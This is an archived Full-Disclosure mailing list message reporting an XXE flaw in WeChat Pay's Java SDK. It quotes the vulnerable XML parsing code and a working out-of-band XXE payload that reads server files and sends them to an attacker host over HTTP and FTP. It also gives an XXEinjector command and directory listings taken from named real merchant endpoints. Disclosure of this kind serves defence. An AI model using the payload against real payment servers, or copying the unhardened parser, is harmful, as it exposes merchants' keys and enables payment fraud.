| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CALtHGqBewmUUF9j0vtFuntAbn9Bnq=_bn5gdMszmy4uxa2-Thw@mail.gmail.com>
Date: Mon, 2 Jul 2018 16:31:26 -0700
From: Rose Jackcode <1024rosecode@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] XXE in WeChat Pay Sdk ( WeChat leave a backdoor on
merchant websites)
sorry,there some to fix:
it lost "?" character。
shoule be fix :
https://pay.weixin.qq.com/wiki/doc/api/app/app.php?chapter=11_1
2018-07-01 8:57 GMT-07:00 Rose Jackcode <1024rosecode@...il.com>:
> Hi List,
>
>
> [Title]
>
>
> XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites)
>
>
> ------------------------------------------
>
>
> [Background]
>
> “Mobile payments surge to $9 trillion a year, changing how people shop,
> borrow—even panhandle”, as WSJ.com once reported. As a payment security
> researcher, I occasionally found a perilous problem about WeChat Pay
> which I think may be esay to make use of. Therefore, I hope to be able
> to contact with WeChat Pay quickly.
>
>
> ------------------------------------------
>
>
> [Description]
>
> When using WeChat payment merchants need providing a notification URL
> to accept asynchronous payment results. Unfortunately, WeChat
> unintentionally provides a xxe vulnerability in the JAVA version SDK which
> handles this result. The attacker can build malicious payload towards the
> notification URL to steal any information of the merchant server as he or
> she want. Once the attacker get the crucial security key (md5-key and
> merchant-Id etc.) of the merchant , he can even buy anything without
> paying by just sending forged info to deceive the merchants.
>
> WeChat can fix it by updating the SDK quite easily, however the bad side
>
> is while exposing merchants may need a long time to go for the sake of time
> , cost and skills needed.
>
>
> ------------------------------------------
>
>
> [Authors]
>
>
> 1024fresher
>
> ------------------------------------------
>
>
> [Detail]
>
>
> The SDK in this page: https://pay.weixin.qq.com/
> wiki/doc/api/jsapi.php chapter=11_1
>
> Just in java vision: https://pay.weixin.qq.com/wiki/doc/api/download/
> WxPayAPI_JAVA_v3.zip
>
> or https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o
> 6ud/view( Backup )
>
>
>
>
>
> README.md in WxPayApi_JAVA_v3.zip,it show more details:
>
>
>
> notify code example:
>
> [
>
> String notifyData = "....";
>
> MyConfig config = new MyConfig();
>
> WXPay wxpay = new WXPay(config);
>
> //conver to map
>
> Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
>
>
> if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {
>
> //do business logic
>
> }
>
> else {
>
> }
>
>
>
> ]
>
> WXPayUtil source code
>
> [
>
>
> public static Map<String, String> xmlToMap(String strXML) throws
> Exception {
>
> try {
>
> Map<String, String> data = new HashMap<String, String>();
>
> /*** not disabled xxe *****/
>
> //start parse
>
>
> DocumentBuilderFactory documentBuilderFactory =
> DocumentBuilderFactory.newInstance();
>
> DocumentBuilder documentBuilder = documentBuilderFactory.
> newDocumentBuilder();
>
> InputStream stream = new ByteArrayInputStream(strXML.getBytes(
> "UTF-8"));
>
> org.w3c.dom.Document doc = documentBuilder.parse(stream);
>
>
>
> //end parse
>
>
>
>
>
> doc.getDocumentElement().normalize();
>
> NodeList nodeList = doc.getDocumentElement().getChildNodes();
>
> for (int idx = 0; idx < nodeList.getLength(); ++idx) {
>
> Node node = nodeList.item(idx);
>
> if (node.getNodeType() == Node.ELEMENT_NODE) {
>
> org.w3c.dom.Element element = (org.w3c.dom.Element)
> node;
>
> data.put(element.getNodeName(), element.getTextContent
> ());
>
> }
>
> }
>
> try {
>
> stream.close();
>
> } catch (Exception ex) {
>
> // do nothing
>
> }
>
> return data;
>
> } catch (Exception ex) {
>
> WXPayUtil.getLogger().warn("Invalid XML, can not convert to
> map. Error message: {}. XML content: {}", ex.getMessage(), strXML);
>
> throw ex;
>
> }
>
> }
>
>
>
> ]
>
>
>
>
>
>
>
>
> ------------------------------------------
>
>
> [Attack demo]
>
>
>
> Post merchant notification url with payload:
>
>
> <?xml version="1.0" encoding="utf-8"?>
>
> <!DOCTYPE root [
>
> <!ENTITY % attack SYSTEM "file:///etc/">
>
> <!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">
>
> %xxe;
>
> ]>
>
>
> data.dtd:
>
>
> <!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack;
> '>">
>
> %shell;
>
> %upload;
>
>
>
> or use XXEinjector tool 【https://github.com/enjoiz/XXEinjector】
>
>
> ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl
>
>
> req.txt :
>
> POST merchant_notification_url HTTP/1.1
>
> Host: merchant_notification_url_host
>
> User-Agent: curl/7.43.0
>
> Accept: */*
>
> Content-Length: 57
>
> Content-Type: application/x-www-form-urlencoded
>
>
> XXEINJECT
>
>
>
>
>
> In order to prove this, I got 2 chinese famous company:
>
> a、momo: Well-known chat tools like WeChat
>
> b、vivo :China's famous mobile phone,that also famous in my country
>
>
>
> Example momo :
>
> attack:
>
> notify url: https://pay.immomo.com/weixin/notify
>
> cmd: /home/
>
>
>
> result:
>
>
>
> ***
>
> logs
>
> zhang.jiax**
>
> zhang.shaol**
>
> zhang.xia**
>
> ****
>
>
> attack:
>
> notify url: https://pay.immomo.com/weixin/notify
>
> cmd: /home/logs
>
>
>
> result:
>
> ***
>
> moa-service
>
> momotrace
>
> ****
>
>
> Example vivo :
>
> attack:
>
> notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
>
> cmd: /home/
>
>
>
> result:
>
> tomcat
>
>
> attack:
>
> notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
>
> cmd: /home/tomcat
>
> result:
>
> .bash_logout
>
> .bash_profile
>
> .bashrc
>
> logs
>
>
> attack:
>
> notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
>
> cmd: /home/tomcat/logs
>
> result:
>
> ****
>
> tomcat-2018-06-28.log
>
> tomcat-2018-06-29.log
>
> tomcat-2018-06-30.log
>
> *****
>
>
>
>
>
>
>
>
> ------------------------------------------
>
>
> [Reference]
>
>
> https://www.youtube.com/watch?v=BZOg_NgvP18
>
> https://www.blackhat.com/docs/us-15/materials/us-15-Wang-
> FileCry-The-New-Age-Of-XXE-java-wp.pdf
>
>
>
> Regards,
>
>
> 1024rosecode
>
>
>
>
Download attachment "image.png" of type "image/png" (71426 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists